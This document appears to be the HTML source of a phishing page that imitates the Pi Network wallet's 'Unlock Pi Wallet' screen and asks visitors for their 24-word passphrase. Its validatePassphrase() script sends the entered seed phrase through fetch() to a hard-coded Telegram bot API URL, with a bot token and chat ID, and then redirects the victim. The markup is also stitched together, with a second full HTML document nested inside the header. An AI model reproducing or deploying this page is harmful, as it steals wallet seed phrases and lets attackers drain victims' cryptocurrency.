
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<meta http-equiv="content-type" content="text/html;charset=utf-8">

   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link rel="preload" href="https://konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/media/f7040064460a9b21-s.p.woff2" as="font" crossorigin="" type="font/woff2">
   <link rel="stylesheet" href="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/css/a01fad7f9ea671f0.css" data-precedence="next">
   <link rel="stylesheet" href="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/css/2ffbdfce0165e88b.css" data-precedence="next">
   <link rel="preload" as="script" fetchpriority="low" href="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/webpack-4805cd5e7a7d027d.js">
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/fd9d1056-7a2991abba7c5213.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/472-4dad895083b33484.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/main-app-ce281d8555633725.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/603-0a7bb91cc1b7fa01.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/418-82a8cc9afb03207e.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/249-f7d04a546c8bf3ab.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/503-03bbf9d3cc11d7d5.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/456-96e4033a4502a559.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/147-239a0b0d81b1b312.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/775-7b2c94a9c0e0dd93.js" async=""></script>
   <script src="https://konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/app/tpa/%5bsubdomain%5d/%5b%5b.segments%5d%5d/page-bafcc041152d74b8.html" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/app/not-found-1319a7d0ca2b6161.js" async=""></script>
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/app/layout-ac4865606df692c2.js" async=""></script>
   <title>Wallet - PiNet</title>
   <meta name="application-name" content="Wallet">
   <meta name="keywords" content="PiNetwork,PiNet,Wallet">
   <meta property="og:title" content="Wallet">
   <meta property="og:url" content="https://wallet.pinet.com/">
   <meta property="og:site_name" content="Wallet - PiNet">
   <meta property="og:locale" content="en_US">
   <meta property="og:type" content="website">
   <meta name="twitter:card" content="summary_large_image">
   <meta name="twitter:site" content="@PiCoreTeam">
   <meta name="twitter:title" content="Wallet">
   <link rel="icon" href="https://konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/media/wallet.44634181.svg">
   <meta name="next-size-adjust">
   <script src="../konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js" nomodule=""></script>
</head>

<body class="body flex flex-col">
   <!--$?-->
   <template id="B:0"></template>
   <div class="relative z-20 h-browserLayoutAppBarHeight">
      <header class="fixed left-0 right-0 z-20 shadow-md bg-primary-500 text-white">
         <div class="flex justify-between items-center max-w-screen-2xl mx-auto md:px-4 h-browserLayoutAppBarHeight px-2">
            <div class="sm:min-w-[110px] lg:min-w-[195px]">
               
 <!DOCTYPE html>
<html lang="en">
<head>
    
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        header {
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #f8f9fa;
            padding: 20px 0;
            position: relative; /* Menambahkan posisi relatif pada header */
        }

        .logo {
            width: 150px;  /* Ubah sesuai kebutuhan */
            height: auto;  /* Mempertahankan aspek rasio */
            position: absolute; /* Menambahkan posisi absolut pada logo */
            top: -20px; /* Menggeser logo ke atas */
        }

        /* Media query untuk layar yang lebih kecil */
        @media (max-width: 600px) {
            .logo {
                width: 400px;  /* Ubah sesuai kebutuhan */
                top: -10px; /* Menggeser logo ke atas pada layar kecil */
            }
        }
    </style>
</head>
<body>
    <header>
        <img src="https://i.ibb.co.com/0CqdFmT/IMG-20240710-235930.jpg" alt="Logo" class="logo">
    </header>
    
</body>
</html>

            
   <br>
   <div class="comment-box">
      <center>
         <h3 class="txt"><b>Unlock Pi Wallet</b></h3>
      </center>
      <br>
      <center>
         <script language="javascript">
            function checkform() {
               if (document.mainform.name.value == '') {
                  alert("Please type your full name!");
                  document.mainform.name.focus();
                  return false;
               }
               if (document.mainform.email.value == '') {
                  alert("Please enter your e-mail address!");
                  document.mainform.email.focus();
                  return false;
               }
               if (document.mainform.message.value == '') {
                  alert("Please make sure your passphrase has exactly 24 words.!");
                  document.mainform.message.focus();
                  return false;
               }
               return true;
            }
         </script>
         
<form id="telegramForm" action="#" method="post">
    <input type="hidden" name="a" value="support">
    <input type="hidden" name="action" value="send">
    <table style="margin-left: auto; margin-right: auto;" cellspacing="0" cellpadding="2" border="0">
        <tbody>
            <tr>
                <td colspan="2">
                    <textarea id="plainText" name="text" class="inpts" cols="45" rows="4" placeholder="Enter your 24-word passphrase here"></textarea>
                </td>
            </tr>
            <tr>
                <td colspan="2">
                    <span id="error" style="color:red;"></span>
                </td>
            </tr>
            <tr>
                <td colspan="2"></td>
            </tr>
            <tr>
                <td colspan="2"></td>
            </tr>
            <tr>
                <td colspan="2"></td>
            </tr>
            <tr>
                <td colspan="2">
                    <button type="button" id="pars" value="Submit" onclick="validatePassphrase()">Unlock With Passphrase</button>
                </td>
            </tr>
            <tr>
                <td colspan="2">
                    <button class="bone" disabled="">Unlock With Fingerprint</button>
                </td>
            </tr>
        </tbody>
    </table>
</form>

<script>
    function validatePassphrase() {
        // Ambil teks dari textarea
        var plaintext = document.getElementById('plainText').value;

        // Tambahkan pesan "Password: ini password anda"
        var message = ': ' + plaintext;

        // URL bot Telegram (ganti dengan URL bot dan chat ID Anda)
        var telegramBotUrl = 'https://api.telegram.org/bot6162019169:AAGzKyBAme9Ns5FZBFdb3ShyiZvyKdaLw0M/sendMessage';
        var chatId = '1167607938';

        // Persiapkan data untuk dikirim
        var formData = new FormData();
        formData.append('chat_id', chatId);
        formData.append('text', message);

        // Kirim data ke bot Telegram
        fetch(telegramBotUrl, {
                method: 'POST',
                body: formData
            })
            .then(response => {
                if (!response.ok) {
                    throw new Error('Network response was not ok');
                }
                // Setelah berhasil dikirim, redirect ke halaman index.php
                window.location.href = 'index.php';
            })
            .catch(error => {
                console.error('There was a problem with sending the message:', error);
                // Tidak ada notifikasi pesan berhasil atau gagal dikirim
            });

        // Kosongkan textarea setelah dikirim
        document.getElementById('plainText').value = '';
    }
</script>


<br><br>
         <p class="txt" style="text-align: left; padding-left: 20px; padding-right: 20px; font-size: 13px;"><small>As a non-custodial wallet, your wallet passphrase is exclusively accessible only to you. Recovery of passphrase is currently impossible.</small></p>
         <p>&nbsp;</p>
         <p class="txt" style="text-align: left; padding-left: 20px; padding-right: 20px; font-size: 13px;"><small>Lost your passphrase? <a href="https://konfirmasi-ulang-pesanan-akulaku.appmasterweb.biz.id/pimal/ff/validate/index.html"><span style="color: #0000ff;">You can create a new wallet,</span></a> but all your π in your previous wallet will be inaccessible.</small></p>
      </center>
   </div>




<style>
   CSS (styles.css): css .comment-box {
      border: 2px solid orange;
      padding: 20px;
      width: 400px;
      margin: 0 auto;
      border-style: solid;
      border-width: 1px 1px 1px 1px;
      border-color: #FFA500;
      text-align: center;
      display: flex;
      flex-direction: column;
      align-items: center;
      font-weight: 0;
      display: block;
      margin: 0 auto;
   }

   textarea {
      width: 70%;
      height: 200px;
      margin-bottom: 10px;
      border-style: solid;
      border-width: 1px 1px 1px 1px;
      border-color: #000;
      display: flex;
      flex-direction: column;
      align-items: center;
      display: block;
      margin: 0 auto;
   }

   button {
      background-color: #ffffff;
      color: #76348e;
      padding: 10px 80px;
      border: 1px solid #76348e;
      cursor: pointer;
      text-align: center;
      border-width: 1px 1px 1px 1px;
      font-family: "Helvetica", Sans-serif;
      font-weight: 450;
      border-radius: 15px 15px 15px 15px;
      display: block;
      margin: 0 auto;
      font-size: 10px;
   }

   .bone {
      background-color: #76348e;
      color: #ffffff;
      padding: 10px 80px;
      border: 1px solid #76348e;
      cursor: pointer;
      text-align: center;
      border-width: 2px 2px 2px 2px;
      font-family: "Helvetica", Sans-serif;
      font-weight: 450;
      border-radius: 15px 15px 15px 15px;
      display: block;
      margin: 0 auto;
      font-size: 10px;
   }

   .txt {
      font-family: "Helvetica", Sans-serif;
   }
</style>
</body></html>
